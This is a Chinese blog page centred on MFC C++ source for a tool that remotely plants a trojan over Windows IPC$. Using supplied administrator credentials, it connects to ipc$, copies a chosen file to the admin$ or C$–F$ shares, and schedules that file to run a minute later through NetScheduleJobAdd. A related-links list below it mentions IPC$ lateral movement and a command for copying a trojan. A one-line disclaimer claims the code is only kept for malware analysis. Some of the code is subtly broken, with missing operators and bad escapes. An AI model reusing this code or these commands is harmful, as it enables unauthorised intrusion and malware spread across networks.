要实现代码例如以下:

/////////////////////////////////////////////////////////////////////////////////////

typedef struct TagHost

{

CString host;

CString user;

CString pass;

CString filename;

CString LocalFilePath;

CListBox* list;

}IPC;

void CShareDlg::OnStart() //启动线程序

{

  UpdateData(TRUE);

  IPC* ipc = new IPC;

  ipc->host = m_host;

  ipc->user = m_user;

  ipc->pass = m_pass;

  ipc->LocalFilePath = m_localfile;

  ipc->filename = filename;

  ipc->list = &m_list;

  AfxBeginThread(ThreadIpcConnect,ipc);

}

/////////////////////////////线程/////////////////////////////////////////////////////

UINT ThreadIpcConnect(LPVOID lpvoid)

{

  IPC* ipc;

  CListBox* list;

  ipc = (IPC*)lpvoid;

  CString host;

  CString admin;

  CString pass;

  CString filename;

  CString localfilepath;

  host = ipc->host ;

  pass = ipc->pass;

  admin = ipc->user;

  localfilepath = ipc->LocalFilePath;

  filename =ipc->filename ;

list = ipc->list;

  BOOL IpcConnect;

  LPTIME_OF_DAY_INFO TimeBuf=NULL;

  NET_API_STATUS Status;

  CString RemoteFilePath,CmdCom("admin$\");

///////////////////////////////IPC连接////////////////////////////////////////////////////////////////

  NETRESOURCE ns;

  TCHAR buf[MAX_PATH];

  wsprintf(buf,"\\%s\ipc$",host);

  ZeroMemory(&ns,sizeof(ns));

  ns.dwScope=RESOURCE_GLOBALNET;

  ns.dwType=RESOURCETYPE_ANY;

  ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;

  ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;

  ns.lpLocalName="";

  ns.lpRemoteName=buf;

  ns.lpProvider=NULL;

  ns.lpComment=NULL;

  CString hhost = host;

  IpcConnect =WNetAddConnection2(&ns,pass,admin,0);

///建立IPC连接

  if(IpcConnect)

  {

//连接成功后

///////////////////////////连接成功上传文件//////////////////////////////////////////////////////////

    RemoteFilePath=("\\"+host+"\admin$\"+filename);

    IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

//拷贝文件到admin$(winnt) 假设复制失败,。向其它共享区复制

      if(!IpcConnect)

        {

          RemoteFilePath=("\\"+host+"\C$\"+filename);

          CmdCom="C:\"+filename;

          IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

            if(!IpcConnect)

            {

               RemoteFilePath=("\\"+host+"\D$\"+filename);

               CmdCom="D:\"+filename;

               IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

           if(!IpcConnect)

                  {

                     RemoteFilePath=("\\"+host+"\E$\"+filename);

                     CmdCom="E:\"+filename;

                     IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

                     if(!IpcConnect)

                       {

                        RemoteFilePath ("\\"+host+"\F$\"+filename);

                        CmdCom = "F:\"+filename;

                     IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE);

                       }

                  }

              }

         }

///////////////////////////得到远程主机时间///////////////////////////////////////////////////////////

         if(IpcConnect)

         {//获取远程主机时间

           Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf);

            if(Status==NERR_Success)

            {//活取时间成功

///////////////////////////启动目标文件///////////////////////////////////////////////////////////////

              DWORD day=1,JobTime;

              AT_INFO ai;

              day=day*2;

              ai.Command=CmdCom.AllocSysString();

              ai.DaysOfMonth=day;

              ai.DaysOfWeek=0;

              ai.Flags=JOB_NONINTERACTIVE;

              ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000;

              Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime);

              //启动上传的文件,一分钟后启动

              if(Status==NERR_Success)

              {

                list->AddString(host+"启动成功");

              }

              else

                list->AddString(host+"启动失败");

              }

          else

            {

             list->AddString(host+"获取时间失败");

            }

         }

         else

         {

          list->AddString(host+"拷贝文件失败");

         }

    }

    else

    list->AddString(host+"连接失败");

return TRUE;

}

 

代码来自于互联网而且这些代码不过为了备份。供分析木马病毒的时候使用

远程IPC种植木马的更多相关文章

  1. IPC$横向渗透代码实现

    思路 IPC$横向渗透的方法,也是病毒常用的扩散方法. 1.建立连接 2.复制文件到共享中C$.D$.E$.F$ 3.获取服务器的时间 3.设定计划任务按时间执行 用到的Windows API 建立网 ...

  2. 一个DDOS木马后门病毒的分析

    http://blog.csdn.net/qq1084283172/article/details/49305827 一.样本信息 文件名称:803c617e665ff7e0318386e24df63 ...

  3. 内网IPC$种马的三种方法

    copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件 WMIC远程运行命令 wmic /node:host /user:adminis ...

  4. 使用shutdown命令实现局域网内远程关机、重启整蛊他人

    用法: shutdown [/i | /l | /s | /r | /g | /a | /p | /h | /e | /o] [/hybrid] [/soft] [/f]    [/m \\compu ...

  5. 域渗透:IPC$ 命名管道

    介绍:IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接 ...

  6. linux端口详解

    Linux端口总结如下: 0|无效端口,通常用于分析操作系统 1|传输控制协议端口服务多路开关选择器 2|管理实用程序 3|压缩进程 5|远程作业登录 7|回显 9|丢弃 11|在线用户 13|时间 ...

  7. 小白日记21:kali渗透测试之提权(一)--本地提权

    本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限.受限制的用户,可以提升到系统至高无上的权限.权限提升漏洞通常是一种"辅助"性质的漏洞,当黑客已经通过某种手段进入了目标机器 ...

  8. ASP漏洞+SQL注入的入侵方法

    本文就是想对装上了防火墙的主机,进行入侵攻击的大概思路小结一下. 首先当然是用扫描器对这台服务器(以下简称主机A)进行常规的扫描,得到初步的信息.再用nmap -sS IP -P0 -p 139 ,透 ...

  9. port与大全portClose方法

    在网络技术,port(Port)通常,有两种含义:首先,物理意义port,例,ADSL Modem.枢纽.开关.路由器连接其他网络设备的接口,如RJ-45port.SCport等等.第二个是逻辑意义p ...

随机推荐

  1. 基于CentOS的MySQL学习补充三--使用Shell批量创建数据库表

    本文出处:http://blog.csdn.net/u012377333/article/details/47006087 接上篇介绍<基于CentOS的Mysql学习补充二--使用Shell创 ...

  2. python测试开发django-13.操作数据库(增删改查)

    前言 django的models模块里面可以新增一张表和字段,通常页面上的数据操作都来源于数据库的增删改查,django如何对msyql数据库增删改查操作呢? 本篇详细讲解django操作mysql数 ...

  3. python测试开发django-12.models设置主键primary_key

    前言 django的models新增数据库表时,如果不设置主键,会默认新增一个id为主键,如果我们想自己设置一个字段为主键,需加个参数primary_key=True 默认id主键 新增一张用户表,表 ...

  4. centos7 开机启动管理

    查看开机启动项 ls /etc/systemd/system/multi-user.target.wants/ 设置开机启动 systemctl enable mongodb.service

  5. Makefile:160: recipe for target 'all' failed (Ubuntu 16.06 + Opencv3.2)解决办法

    前言 之前一直用的opencv 好好的,今天安装了anaconda之后,python中的opencv不能用了,即便是拷贝cv2.so之后也是不能用,问题如下: 根本原因 安装anaconda之后,很多 ...

  6. sqlserver 中WITH NOLOCK、HOLDLOCK、UPDLOCK、TABLOCK、TABLOCKX

    https://www.cnblogs.com/sthinker/p/5922967.html SqlServer查询语句中用到的锁 作者: wokofo 前段时间**公司DBA来我们这培训.讲了一大 ...

  7. scrapy框架系列 (4) Scrapy Shell

    Scrapy Shell Scrapy终端是一个交互终端,我们可以在未启动spider的情况下尝试及调试代码,也可以用来测试XPath或CSS表达式,查看他们的工作方式,方便我们爬取的网页中提取的数据 ...

  8. EF和LINQ 调用存储过程

    好久没有更新文章了,最近项目比较忙都没什么时间来分享最近的问题. 今天遇到一个超级傻逼的问题.C#中调用存储过程,自己code也10来年了,这应该是很简单的问题了.今天有2个新的api,一个只有1个参 ...

  9. Downloading files from a server to client, using ASP.Net, when file size is too big for MemoryStream using Generic Handlers (ashx)

    Currently, I was trying to write an ASP.Net application that involved a user clicking a ASP.Net butt ...

  10. [leetcode]Sort Colors @ Python

    原题地址:https://oj.leetcode.com/problems/sort-colors/ 题意: Given an array with n objects colored red, wh ...